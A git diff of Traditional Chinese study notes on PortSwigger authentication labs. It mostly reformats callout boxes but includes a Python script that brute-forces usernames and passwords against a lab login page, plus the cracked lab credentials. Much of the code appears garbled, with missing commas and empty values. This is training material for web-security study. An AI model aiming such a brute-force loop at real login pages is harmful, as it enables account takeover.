@@ -113,112 +113,115 @@ Ref: [https://portswigger.net/web-security/authentication](https://portswigger.n
113113
114114* ** 回應時間** :如果大多數請求都以相似的回應時間處理,任何偏離此時間的請求都表明幕後發生了不同的事情。這是猜測的用戶名可能正確的另一個指示。例如,網站可能只有在用戶名有效時才檢查密碼是否正確。這個額外步驟可能導致回應時間略微增加。這可能很微妙,但攻擊者可以透過輸入過長的密碼使網站需要明顯更長時間處理,從而使這種延遲更加明顯。
115115
116- * ** Lab: [ Username enumeration via different responses] ( https://portswigger.net/web-security/authentication/password-based/lab-username-enumeration-via-different-responses ) **
117- 1 . 寫程式爆破帳號和密碼:
118- ``` python
119- import requests
120-
121- def init ():
122- global cookies, headers, data
123- cookies = {
124- ' session' ' H1Uhv8fuWXoes5VysCN1ORMv2Nc42qj9'
125- }
126-
127- headers = {
128- ' accept' ' text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7'
129- ' accept-language' ' zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7'
130- ' cache-control' ' no-cache'
131- ' content-type' ' application/x-www-form-urlencoded'
132- ' dnt' ' 1'
133- ' origin' ' https://0a0c008d03de822e80d7fdae008d005f.web-security-academy.net'
134- ' pragma' ' no-cache'
135- ' priority' ' u=0, i'
136- ' referer' ' https://0a0c008d03de822e80d7fdae008d005f.web-security-academy.net/login'
137- ' sec-ch-ua' ' "Not.A/Brand";v="99", "Chromium";v="136"'
138- ' sec-ch-ua-mobile' ' ?0'
139- ' sec-ch-ua-platform' ' "macOS"'
140- ' sec-fetch-dest' ' document'
141- ' sec-fetch-mode' ' navigate'
142- ' sec-fetch-site' ' same-origin'
143- ' sec-fetch-user' ' ?1'
144- ' upgrade-insecure-requests' ' 1'
145- ' user-agent' ' Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36'
146- # 'cookie': 'session=H1Uhv8fuWXoes5VysCN1ORMv2Nc42qj9',
147- }
148-
149- data = {
150- ' username' ' 1322'
151- ' password' ' 123123'
152- }
153-
154- def enum_username ():
155- with open (' username.txt' ' r' as f:
156- usernames = f.readlines()
157- for i in usernames:
158- data = {
159- ' username'
160- ' password' ' 123'
161- }
162-
163- response = requests.post(
164- ' https://0a0c008d03de822e80d7fdae008d005f.web-security-academy.net/login'
165- cookies = cookies,
166- headers = headers,
167- data = data,
168- )
169-
170- print (f ' \r Trying username: { i.strip()} ' , end = ' '
171-
172- if ' Invalid username' not in response.text:
173- print (f ' \n Found username: { i.strip()} ' )
174- break
175-
176- def enum_password ():
177- with open (' password.txt' ' r' as f:
178- passwords = f.readlines()
179- for i in passwords:
180- data = {
181- ' username' ' ansible'
182- ' password'
183- }
184-
185- response = requests.post(
186- ' https://0a0c008d03de822e80d7fdae008d005f.web-security-academy.net/login'
187- cookies = cookies,
188- headers = headers,
189- data = data,
190- )
191-
192- print (f ' \r Trying password: { i.strip()} ' , end = ' '
193-
194- if ' Incorrect password' not in response.text:
195- print (f ' \n Found password: { i.strip()} ' )
196- break
197-
198- if __name__ == ' __main__'
199- init()
200- enum_password()
201- ```
202- 2 . 取得正確帳號為 `ansible` ,密碼為 `michelle` ,登入後即完成 Lab。
203-
204- * ** Lab: [Username enumeration via subtly different responses](https:// portswigger.net/ web- security/ authentication/ password- based/ lab- username- enumeration- via- subtly- different- responses)**
205- 1 . 嘗試任意登入,發現回應 `Invalid username or password.`
206- 2 . 使用 Burp 的 Intruder 枚舉使用者名稱,然而
207-
116+ ::: tip ** Lab: [ Username enumeration via different responses] ( https://portswigger.net/web-security/authentication/password-based/lab-username-enumeration-via-different-responses ) **
117+ 1 . 寫程式爆破帳號和密碼:
118+ ``` python
119+ import requests
120+
121+ def init ():
122+ global cookies, headers, data
123+ cookies = {
124+ ' session' ' H1Uhv8fuWXoes5VysCN1ORMv2Nc42qj9'
125+ }
126+
127+ headers = {
128+ ' accept' ' text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7'
129+ ' accept-language' ' zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7'
130+ ' cache-control' ' no-cache'
131+ ' content-type' ' application/x-www-form-urlencoded'
132+ ' dnt' ' 1'
133+ ' origin' ' https://0a0c008d03de822e80d7fdae008d005f.web-security-academy.net'
134+ ' pragma' ' no-cache'
135+ ' priority' ' u=0, i'
136+ ' referer' ' https://0a0c008d03de822e80d7fdae008d005f.web-security-academy.net/login'
137+ ' sec-ch-ua' ' "Not.A/Brand";v="99", "Chromium";v="136"'
138+ ' sec-ch-ua-mobile' ' ?0'
139+ ' sec-ch-ua-platform' ' "macOS"'
140+ ' sec-fetch-dest' ' document'
141+ ' sec-fetch-mode' ' navigate'
142+ ' sec-fetch-site' ' same-origin'
143+ ' sec-fetch-user' ' ?1'
144+ ' upgrade-insecure-requests' ' 1'
145+ ' user-agent' ' Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36'
146+ # 'cookie': 'session=H1Uhv8fuWXoes5VysCN1ORMv2Nc42qj9',
147+ }
148+
149+ data = {
150+ ' username' ' 1322'
151+ ' password' ' 123123'
152+ }
153+
154+ def enum_username ():
155+ with open (' username.txt' ' r' as f:
156+ usernames = f.readlines()
157+ for i in usernames:
158+ data = {
159+ ' username'
160+ ' password' ' 123'
161+ }
162+
163+ response = requests.post(
164+ ' https://0a0c008d03de822e80d7fdae008d005f.web-security-academy.net/login'
165+ cookies = cookies,
166+ headers = headers,
167+ data = data,
168+ )
169+
170+ print (f ' \r Trying username: { i.strip()} ' , end = ' '
171+
172+ if ' Invalid username' not in response.text:
173+ print (f ' \n Found username: { i.strip()} ' )
174+ break
175+
176+ def enum_password ():
177+ with open (' password.txt' ' r' as f:
178+ passwords = f.readlines()
179+ for i in passwords:
180+ data = {
181+ ' username' ' ansible'
182+ ' password'
183+ }
184+
185+ response = requests.post(
186+ ' https://0a0c008d03de822e80d7fdae008d005f.web-security-academy.net/login'
187+ cookies = cookies,
188+ headers = headers,
189+ data = data,
190+ )
191+
192+ print (f ' \r Trying password: { i.strip()} ' , end = ' '
193+
194+ if ' Incorrect password' not in response.text:
195+ print (f ' \n Found password: { i.strip()} ' )
196+ break
197+
198+ if __name__ == ' __main__'
199+ init()
200+ enum_password()
201+ ```
202+ 2 . 取得正確帳號為 `ansible` ,密碼為 `michelle` ,登入後即完成 Lab。
203+ :::
204+
205+ ::: tip ** Lab: [Username enumeration via subtly different responses](https:// portswigger.net/ web- security/ authentication/ password- based/ lab- username- enumeration- via- subtly- different- responses)**
206+
207+ 1 . 嘗試任意登入,發現回應 `Invalid username or password.`
208+ 2 . 使用 Burp 的 Intruder 枚舉使用者名稱,然而
209+ :::
208210
209211
210212# # 第三方身分驗證機制的漏洞
211213
212214如果你很喜歡破解身分驗證機制並且已經完成所有身分驗證的題目,你可能會像嘗試 OAuth 身分驗證的 Labs。
213215
214- > [ ! note]
215- >
216- > [OAuth authentication](https: // portswigger.net / web - security / oauth)
216+ ::: info Read more
217+ [OAuth authentication](https: // portswigger.net / web - security / oauth)
218+ :::
217219
218220# # 防止對你自己的身分驗證機制的攻擊
219221
220222我們已經展示了網站因實施身份驗證的方式而可能存在漏洞的幾種方式。為了降低你自己的網站遭受此類攻擊的風險,應該嘗試遵守幾項原則。
221223
222- > [! note]
223- >
224- > [如何使身分驗證機制安全](https:// portswigger.net/ web- security/ authentication/ securing)
224+ ::: info Read more
225+
226+ * [如何使身分驗證機制安全](https:// portswigger.net/ web- security/ authentication/ securing)
227+ :::
0 commit comments